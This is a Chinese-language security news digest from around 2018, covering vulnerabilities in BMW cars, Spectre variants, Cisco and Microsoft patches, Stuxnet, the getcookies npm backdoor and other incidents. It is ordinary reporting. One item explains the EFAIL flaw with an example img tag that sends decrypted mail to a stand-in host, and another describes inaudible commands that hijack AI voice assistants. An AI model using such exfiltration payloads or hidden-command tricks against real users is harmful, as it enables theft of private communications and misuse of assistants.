匿名懦夫1433 写道 "腾讯科恩实验室在对几款宝马车型进行研究后，发现了多个漏洞。研究人员称，他们所发现的14个漏洞，可通过不同方式触发，并有可能影响到从2012年到2017年生产的多款宝马汽车，对车内的CAN网络产生恶意影响。宝马方面称，他们在3月收到报告后，确认这些被发现的漏洞确实存在于车载影音娱乐系统和车载通信系统中，其中涉及到蜂窝网络的漏洞已经在4月被修补，其他模块的更新将会通过宝马官方渠道进行。腾讯的研究人员并没有披露漏洞细节，且和他们在2016、2017年对特斯拉的安全研究成果展示中使用的方式不同，他们本次并没有对攻击过程和效果进行视频展示，这可能是考虑到宝马绝大多数车型的远程更新能力有限而作出的缓解措施。"

FBI 被指再三向国会和公众夸大了加密手机问题。FBI 局长 Christopher Wray 去年 12 月估计由于加密仅 2017 年一年调查人员无法访问 7,800 部手机.然而正确的数字比这个要低得多，可能只有 1000 到 2000 部。FBI 在一份声明中称，初步估计是由于程序错误而过高估计了报告的移动设备数量。该问题据称是因为它使用了三个不同的数据库跟踪手机，导致了手机数量的重复计算。这个错误是如此低级，很难想象究竟是 FBI 的不称职还是故意为之。

英特尔正式披露了两个 CPU 新漏洞 Spectre variants 3a 和 4。漏洞是 Google 和微软研究员发现的，类似今年初披露的 Meltdown 和 Spectre 漏洞。AMD 也发表声明证实其部分处理器也受到影响。新发现的两个漏洞其一编号为 CVE-2018-3639， Speculative Store Bypass (SSB)，aka Spectre Variant 4，该漏洞可能会向本地用户访问权限的攻击者通过边信道攻击披露信息；其二编号 CVE-2018-3640，Rogue System Register Read (RSRE)，aka Spectre variants 3a，该漏洞能向攻击者披露系统参数。英特尔第二代到第八代 Core 处理器都受到影响。修复漏洞将需要微码更新，目前英特尔还没有释出。

Gigantic Software CEO John Byrd 在 Quora 上发表了一篇受到广泛 热议的帖子，认为由一群神秘作者开发的 Stuxnet 蠕虫是至今创造的最复杂软件。Stuxnet 是一种计算机蠕虫，大约写于 2005 年到 2010 年之间。这种蠕虫一开始可能只存在于 U 盘里，有人捡到或收到邮寄来的 U 盘，然后插到电脑上看看有什么在里面。当 U 盘插到 Windows PC，它会悄悄运行和拷贝到机器上。它有三种运行方法，如果一种无效就切换到另一种。至少两种方法在当时没人知道，它利用了两种 Windows 0day 漏洞。一旦蠕虫在计算机上运行，它会尝试获得管理员权限，不管机器上是否安装杀毒软件。它能绕过大部分杀毒软件，然后根据运行的 Windows 版本利用两种方法之一获取管理权限。它能隐藏痕迹，杀毒软件无法探测到它的存在。它会检查计算机有没有联网，如果能联网，它会尝试访问 http://www.mypremierfutbol.com 或 http://www.todaysfutbol.com。当时这两个网站服务器托管在马来西亚和丹麦。它会通过加密连接告诉服务器它已经控制了一台新 PC。然后蠕虫自动更新到最新版本。蠕虫会将自己拷贝到任何插到电脑上的 U 盘内，它安装了一个假的设备驱动程序，使用了台湾公司 Realtek 的证书签名。到这个阶段，该蠕虫其实连暖身还没有暖身呢。

思科释出了 16 个安全公告，其中有三个漏洞的威胁评级被归类为高危。这三个漏洞一个是硬编码的后门账号和两个身份系统绕过。根据编号为 CVE-2018-0222 的漏洞描述，思科称 Cisco Digital Network Architecture (DNA) Center 发现了一个未记录的默认管理账号静态用户凭证——即俗称的后门账号。攻击者可利用该账号登录到受影响的系统，能使用 root 权限执行任意代码。思科称该漏洞是在内部的安全测试中发现的。

迈克菲的研究人员报告，朝鲜黑客设法在 Google play 上托管了至少三个应用去窃取脱北者的个人信息。三个应用是通过 Facebook 上的接触选择性的进行传播，在 Google 接到举报下架这些应用前它们被下载了大约 100 次。这些应用包含了隐藏的功能，允许被感染设备接收额外的执行代码，窃取个人照片、通讯簿和短信内容。迈克菲去年 11 月报告它发现有恶意 Android 文件包含的后门与朝鲜黑客组织 Lazarus 使用的后门非常相似。这些相似性包括使用相同的 seed 生成加密密钥，使用相似的方法与控制服务器进行通信。

去年初，Wikileaks 披露了代号为 Vault 7 的 CIA 黑客工具集。Vault 7 包含了感染 iPhone、Wi-Fi 路由器和思科网关等设备的漏洞利用和文档，被认为是 CIA 历史上已知最大规模的机密信息泄漏。现在，美国政府披露了背后泄密者的身份：29 岁的 Joshua A. Schulte，他已经在一年前就遭到逮捕，FBI 在 Wikileaks 公开第一批 Vault 7 文件后一周就突击搜查了他的家，扣押了手机、电脑和“最高机密的政府情报”，他随即成为泄密调查的主要目标。当局最初是以持有儿童色情的名义指控他的，没有涉及到 Vault 7 泄密。他的律师已经否认其客户卷入了 Vault 7 泄密。Schulte 在 NSA 工作了 4 个月，其职务是系统工程师，在 2010 年以软件工程师的身份进入 CIA，一直工作了六年直至 2016 年加盟彭博社。

世界最大的美国黑客大会之一首次在中国举办，尽管中国政府警告公民不要与国际安全社区分享工具，但此次大会仍然吸引了大批人参加。随着中国寻求收紧对技术和信息的控制，政府命令本土黑客放弃参加一些全球黑客大赛，尽管如此，上周末仍有逾 1300 人参加了在北京举行的 Def Con 全球黑客大会。“中国成为（在美国以外）举办 Def Con 的最佳地点，是因为未来互联网安全领域确实将会有两个超级大国：美国和中国，”该大会的创办人 Jeff Moss 称，“安全问题是全球性问题，需要全球应对。”该大会强调包括潜在软件漏洞在内的全面开源共享，它试图创造一个空间，使来自不同国家和企业的所谓 “黑客”——出于乐趣（有时是为了赚钱）在计算系统中寻找漏洞和潜在薄弱环节的计算机高手——和网络安全专业人士可以在此分享观点。

xuan 写道 "该漏洞主要原理：在加密块前后插入外置资源引用字段。

比如邮件内容是ABC加密后变为XXX。邮件内容会有很多块组成，多数邮件客户端支持部分块加密、部分块不加密的功能。攻击者可以在加密块前后插入明文块，使得消息变为：

<img src="https://someweb.site/XXX" />

当邮件客户端收到邮件时，需要对加密块解密，并与非加密的内容拼接。得到以下结果：

<img src="https://someweb.site/ABC" />

在邮件客户端渲染这封邮件的时候，会自动的请求someweb.site，并上传邮件内容ABC。导致邮件泄密。

参考来源 https://www.eff.org/deeplinks/2018/05/attention-pgp-users-new-vulnerabilities-require-you-take-action-now

安全研究人员发现，先前被举报而下架的恶意应用又重返了 Google 官方应用商店 Play Store，恶意开发者所采用的方法不过是改了个名字，根本没有修改代码来躲避所谓的自动审核。Play Store 采用自动方法而不是人工审核的方法检查递交的应用，它的自动检查流程被认为存在缺陷，经常会让恶意应用通过检查成功上架，而对于下架的恶意应用 Google 看起来并没有更新它的方法。赛门铁克的研究人员发现了 7 个重新上架的恶意程序，在再次向 Google 安全团队举报之后这些应用又再次下架了。

RSA 安全会议上进行的一项调查发现，绝大多数公司仍然缺乏恰当的安全保护措施，其中一些公司甚至出于不同理由有意忽视安全漏洞，理由从没有时间到缺乏专有技术。调查结果显示，只有 47% 的机构在获悉漏洞之后会尽可能快的修复，26% 的人称他们公司没有时间打补丁，16% 的人称他们公司不知道如何打补丁，16% 要等待一个月时间才会打上补丁，还有 8% 的被调查者称他们一年才打上一到两次补丁。71% 的人承认他们能黑掉自己的公司。

蓝色巨人禁止雇员使用可移除存储设备。IBM 的全球首席信息安全官 Shamla Naidoo 在给雇员的通知中称，公司将所有可移除便捷式存储设备（如 USB、SD 卡和闪存盘）包含在禁止数据传输的范围之内。公告声明部分部门已执行这一政策一段时间了，但未来几周这一政策将被公司所有部门采用。IBM 此举旨在最小化误放、丢失或误用可移除存储设备可能导致的财务和名誉损失。如果雇员需要转移数据，IBM 建议他们使用基于云的数据共享方案。

年轻一代生长在一个习惯与智能设备对话的时代，但有些话可能是你听不见的悄悄话。过去两年，研究人员已经演示了他们能向亚马逊的 Alexa 和 Google Assistant 发送人耳听不到的秘密指令，悄悄激活智能手机或智能音箱的 AI 助手，命令它们拨打电话或打开网站。如果被恶意的人利用，AI 助手也可能被利用解开门禁或给人转钱或购买商品。 现在，加州伯克利的研究人员报告他们能将指令直接嵌入到唱片或语音短信中，在你听管弦乐或听某人的语音时，亚马逊的 Echo 可能会听到指令在你的购物篮里加入东西。

中国用户报告他通过百度软件中心下载的开源软件 PuTTY 被发现捆绑了恶意程序。在曝光之后，百度已经删除了相关页面和快照（谷歌快照还在）。用户下载的 PuTTY 没有数字签名，启动后首先访问一个 URL，获取想要下载的文件列表，运行时则会在后台静默下载 “金山毒霸” 和“爱奇艺”等程序。对下载网站的分析发现，此事可能是一名百度工程师所为，可能是这名工程师利用职务之便修改程序实施恶意推广。

Linux、Windows、macOS、FreeBSD 和 Xen 实现曝出了一个设计漏洞，允许攻击者劫持或崩溃运行英特尔和 AMD 处理器的计算机。修复补丁基本上都已经释出，Linux 内核早在 3 月份就已经修复。漏洞编号为 CVE-2018-8897，原因被认为是微软、苹果和 Linux 开发者误读英特尔和 AMD 处理器处理特定例外的文档有关。问题的核心是 POP SS 指令。

本周二微软释出了五月例行更新，修复了两个正被攻击者利用的漏洞。第一个漏洞位于 VBScript Engine 中，引擎处理内存的方式存在一个释放后使用的漏洞，允许攻击者利用用户登录系统的相同权限执行任意代码，如果用户以管理员身份登录，这意味着攻击者可以完整控制系统；如果用户的权限较低，那么攻击者也可以组合利用提权漏洞控制系统。该漏洞编号为 CVE-2018-8174，属于高危级漏洞，正被攻击者利用。第二个漏洞则是 Win32k 组件的提权漏洞，编号 CVE-2018-8120，成功利用该漏洞的攻击者可以在内核模式执行任意代码。微软的例行更新共修复了 68 个漏洞，其中 21 个属于高危漏洞。

安全研究人员报告，攻击者正利用一个已修复的 Drupal 高危漏洞入侵网站植入挖矿脚本用访问者的计算机挖掘数字货币。被入侵的网站属于联想、UCLA 和美国全国劳资关系委员会等企业、大学和机构所有。美国网站最多，其次是法国、加拿大、德国和俄罗斯。攻击者利用的是今年三月公布的被称为 Drupalgeddon2 的 Drupal 内容管理系统高危漏洞，植入的 JavaScript 文件托管在 vuuwd.com 上，挖矿脚本会使用访问者计算机 80% 的 CPU 资源挖掘门罗币。安全研究员建议使用 Drupal 的网站尽可能快的更新到最新版本。

Node.js 项目的 NPM 是世界上最大的包管理器。NPM 团队最近发现和阻止了在流行 JavaScript 包中植入后门的一次尝试。后门机制隐藏在最近创造的 JavaScript 库 getcookies 内。对其进行分析后发现，getcookies 含有一个复杂机制能从远处攻击者接收指令，该后门允许攻击者在服务器上输入任何代码然后执行。getcookies 库并不流行，但通过一个嵌套的依赖链它进入到了一个解析电子邮件数据的流行 JS 包 Mailparser 内。Mailparser 包的每周下载量超过 6.6 万。调查人员没有发现利用该后门的攻击。

在 GitHub 之后，Twitter 也承认用户密码在加密前明文储存在了内部日志中，可能导致用户密码泄露（给 Twitter 雇员），所以为谨慎起见它鼓励所有用户修改密码，如果用户复用密码，那么最好也一并修改在其它网站和服务中使用的相同密码。Twitter 称目前没有迹象显示用户密码被内部人士窃取或滥用。几天前，GitHub 也发现一部分用户的密码在加密处理前明文储存在内部日志中，它通知用户这些明文密码可能被该公司的雇员看到。

研究人员演示了最新的 Rowhammer 攻击，利用 GPU 翻转比特入侵 Android 手机。 Rowhammer 攻击是指利用临近内存单元之间电子的互相影响，在足够多的访问次数后让某个单元的值从 1 变成 0，反之亦然。这种现象被称为比特翻转（bitflipping），可被利用获取更高的权限。最新的漏洞利用被称为 GLitch（PDF），首次演示了 GPU 能翻转个别储存在 DRAM 中的比特。 GLitch 也是第一个利用标准 JavaScript 入侵智能手机的 Rowhammer 攻击，意味着只需要用户访问一个恶意网站之后就能利用漏洞远程执行代码。GLitch 入侵手机平均不到 2 分钟，比之前的 Rowhammer 攻击高效得多。